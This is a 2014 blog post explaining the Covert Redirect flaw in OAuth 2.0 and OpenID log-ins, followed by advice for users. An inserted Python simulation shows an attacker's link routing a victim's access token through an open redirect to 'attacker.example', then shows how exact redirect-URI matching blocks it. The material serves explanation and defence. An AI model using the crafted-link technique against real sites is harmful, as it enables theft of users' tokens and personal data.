Staying Secure: Flaws in open-source software

Tuesday 06 May 2014

Jeran Camapnella looks at the implications of flaws in open-source software and gives his tips on staying secure online.

The latest flaw

Just weeks after the OpenSSL vulnerability "Heartbleed" gave us all a heart attack, today we learn that another widely deployed piece of open login technology has a flaw of its own.

This flaw affects the widely used log-in protocols OAuth 2.0 and OpenID. Many sites offer this kind of third-party authorization, including Google, Facebook, Microsoft and LinkedIn, among others. Wang Jing, a Ph.D. student at Nanyang Technological University in Singapore, discovered the serious vulnerability he calls "Covert Redirect": an attacker can present a genuine log-in pop-up that is tied to the affected site's real domain, and then quietly receive what the user hands over.

A sample list of websites affected by the Covert Redirect vulnerability was given in a video accompanying the original article.

Here is the gist of the vulnerability:

Let's say a user logs in at TED Talks with Facebook, and TED Talks hosts an open redirect (a page that forwards visitors to whatever address it is given). An attacker can build a Facebook log-in link whose return address is that TED Talks redirect, pointed onward at the attacker's own server. Facebook's pop-up will still say "Authorize TED Talks to access your account?" using the correct site's name, because the return address really is on TED Talks' domain. The user cannot tell that anything is wrong with the third-party website (in this case, TED Talks) at all.

The weakness is on the third-party site's side (an open redirect, combined with the identity provider accepting any return address under that site's domain), and it is not a new one.

If the user chooses to authorize the log-in, the resulting access token, and with it the personal data it unlocks (depending on what was asked for), is delivered to the attacker instead of to the legitimate website.

That data can include email addresses, birth dates and contact lists, and, depending on the permissions granted, possibly control of the account.

Overall, this has long been a known issue to those who have built applications on OAuth. Before OAuth it was far worse: developers had to rely on proprietary approaches such as Google's ClientLogin, in which an app collected the user's actual credentials in order to request resources on the user's behalf, so mishandling that data had far graver consequences.

Wang reportedly reported the flaw to Facebook, but was told that the company "understood the risks associated with OAuth 2.0."

Facebook is not the only site affected. Wang states in his blog that he has reported this to Google, LinkedIn, and Microsoft, which gave him various responses on how they would handle the matter.

"Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks," said Wang. "However, in the real world, a large number of third-party applications do not do this due to various reasons. The lack of incentive makes the systems based on OAuth 2.0 or OpenID highly vulnerable," his blog states.
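To make the gist above concrete, and to show why the whitelist Wang describes closes the hole, here is an added simulation. It is not code from the original article or from any of the companies named; the provider URL, the client's `/go?next=` open redirect, the `www.ted.com` callback, the attacker host and the token format are all hypothetical. Three parties pass URL strings through plain functions, with no network involved: the identity provider, the client site registered with it, and the attacker who crafts the link.

```python
"""Covert Redirect, simulated end to end (constructed example).

  * the identity provider (Facebook or Google in the article) issues tokens;
  * the client site (TED Talks in the article) is registered with the
    provider and also hosts an open redirect, /go?next=<any URL>;
  * the attacker crafts the authorization link the victim clicks.
Names, URLs and the token format are hypothetical.
"""
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

PROVIDER_AUTHORIZE = "https://provider.example/oauth/authorize"
CLIENT_ID = "tedtalks"
CLIENT_DISPLAY_NAME = "TED Talks"
CLIENT_HOST = "www.ted.com"
REGISTERED_REDIRECT_URI = "https://www.ted.com/oauth/callback"  # the whitelist entry
OPEN_REDIRECT_ENDPOINT = "https://www.ted.com/go"               # the weak spot
ATTACKER_SINK = "https://attacker.example/collect"


def redirect_uri_is_allowed(redirect_uri: str, strict: bool) -> bool:
    """Provider-side check of the redirect_uri parameter.

    strict=False is the loose domain match the article describes: anything on
    the registered site's scheme and host passes, including /go.
    strict=True is the fix Wang asks for: exact match against the whitelist.
    """
    if strict:
        return redirect_uri == REGISTERED_REDIRECT_URI
    want, got = urlparse(REGISTERED_REDIRECT_URI), urlparse(redirect_uri)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def consent_prompt(auth_url: str) -> str:
    """Text of the provider's pop-up. The app name is looked up from client_id,
    never from redirect_uri, so a crafted link shows the legitimate site's name."""
    params = parse_qs(urlparse(auth_url).query)
    name = CLIENT_DISPLAY_NAME if params["client_id"][0] == CLIENT_ID else "Unknown app"
    return f"Authorize {name} to access your account?"


def provider_authorize(auth_url: str, user_consents: bool, strict: bool) -> Optional[str]:
    """Where the provider sends the browser after the consent screen.

    Implicit flow (response_type=token): the access token travels in the URL
    fragment. Returns None if the provider refuses to redirect at all.
    """
    params = parse_qs(urlparse(auth_url).query)
    redirect_uri = params["redirect_uri"][0]
    if params["client_id"][0] != CLIENT_ID or not redirect_uri_is_allowed(redirect_uri, strict):
        return None
    if not user_consents:
        return None
    token = "tok_" + secrets.token_urlsafe(16)  # hypothetical token format
    return redirect_uri + "#" + urlencode({"access_token": token, "token_type": "bearer"})


def browser_follows_client_site(url: str) -> str:
    """What the client site does with the browser, as the browser sees it.

    Only /go is an open redirect. Browsers keep the fragment when a 302
    Location carries no fragment of its own (RFC 7231 section 7.1.2), so the
    token rides along to wherever ?next= points.
    """
    parsed = urlparse(url)
    if parsed.netloc == CLIENT_HOST and parsed.path == "/go":
        nxt = parse_qs(parsed.query).get("next", [None])[0]
        if nxt:
            return nxt + ("#" + parsed.fragment if parsed.fragment else "")
    return url  # the real callback keeps the token on the client site


def legitimate_link() -> str:
    """The link the client site itself sends users to."""
    query = urlencode({"client_id": CLIENT_ID, "response_type": "token",
                       "redirect_uri": REGISTERED_REDIRECT_URI, "scope": "email"})
    return PROVIDER_AUTHORIZE + "?" + query


def attacker_link() -> str:
    """Same link, but redirect_uri is the client's open redirect aimed at the
    attacker. It is still on www.ted.com, so the loose check accepts it."""
    evil_redirect = OPEN_REDIRECT_ENDPOINT + "?" + urlencode({"next": ATTACKER_SINK})
    query = urlencode({"client_id": CLIENT_ID, "response_type": "token",
                       "redirect_uri": evil_redirect, "scope": "email"})
    return PROVIDER_AUTHORIZE + "?" + query


def token_lands_on(auth_url: str, strict: bool) -> Optional[str]:
    """Run the flow with a consenting user; return the host that ends up holding
    the token, or None if the provider rejected the redirect_uri."""
    location = provider_authorize(auth_url, user_consents=True, strict=strict)
    if location is None:
        return None
    return urlparse(browser_follows_client_site(location)).netloc


if __name__ == "__main__":
    print(consent_prompt(attacker_link()))  # same wording as for the real link
    print("loose match, crafted link   ->", token_lands_on(attacker_link(), strict=False))
    print("strict whitelist, crafted   ->", token_lands_on(attacker_link(), strict=True))
    print("strict whitelist, real link ->", token_lands_on(legitimate_link(), strict=True))
```

The two things to notice are that the consent text is identical for the crafted and the real link, and that the only change needed to stop the leak is on the provider's side: comparing the supplied redirect URI to the registered one by exact string match rather than by domain. The open redirect on the client site remains a bug worth fixing in its own right, but with exact matching it no longer yields tokens. Later OAuth 2.0 security guidance made exact redirect URI comparison mandatory for this reason.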

PayPal also has addressed the issue. James Barrese, PayPal’s CTO commented in a blog post Friday saying, "When PayPal implemented OAuth2.0/OpenID, we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth2.0/OpenID vulnerability."

PayPal did not add details about those measures.

It is well known among developers that OAuth 2.0 deployments are exposed to phishing and redirect attacks whenever return addresses are not strictly validated.

Users who trust Facebook and Google need to understand that the security of an OAuth log-in is often only as good as the third-party site using it.

A user might assume that because a site lets them sign in with Facebook, Facebook has vetted or endorsed that site. That is not the case.

How to protect yourself?

If you wish to avoid any potential loss of data, be careful with links that immediately ask you to log in to Facebook or Google. If a page you did not expect presents such a log-in or authorization prompt, close the tab rather than authorizing; that defeats the redirect and phishing variants of this attack.

While this issue is nowhere near the level of Heartbleed, it is easy for attackers to build these redirects and phish for personal information, and a fix is unlikely to arrive quickly: according to Wang, it is difficult to get implemented because third-party sites have "little incentive" to fix the problem.

These security issues keep coming up, and I believe they will come more and more frequently. You can read some of my previous articles on preparing for the new wave of cyber criminals, starting with securing your home network and passwords.

The fact is that many of these vulnerabilities have been in place for a very long time. It was never a question of if but when they would be found. Once a flaw is published, malicious hackers learn of its existence and set about exploiting it before the fix can be rolled out.

Some of these flaws have been in place for years prior to their discovery. I have personally never used a social connect to log-in at other sites. I have always used an independent user account, not linked to my social networks, for every website with which I interact.

To my dismay, many news organizations have now made a Facebook connection mandatory for commenting – as if trolls and spammers could not just create Facebook account after Facebook account and use them as they want.

I do not see a logical reason for a "one-size-fits-all login", and many other internet users feel the same. What it boils down to, yet again, is a fundamental point of security: users should do their best to operate from trusted sites that have invested time and resources in the continued security of their platforms.

Many of our favorite sites have been up for years, and in those years hackers have had the time to build the tools to get around the security that is in place.

Staying ahead of the hackers

It is simply a fact that internet-facing systems are not secure enough; vulnerabilities will continue to be found, and hackers will take advantage of them.

But would adequate security have to mean poor usability? The mindset needs to change, and we need bright people innovating new solutions that are both easy to use and highly secure.

The big companies that purchase other companies for billions need to start investing as much in their security as in their pretty web pages and gimmicks.

The internet, bitcoin and all they bring may well be revolutionary technology; no doubt our world in 10 years will look nothing like today's because of them. But knowing what site you are on and limiting the personal information you readily give away will go some way toward securing your identity today.

As Always, Be Alert, Be Accurate, Be Aware
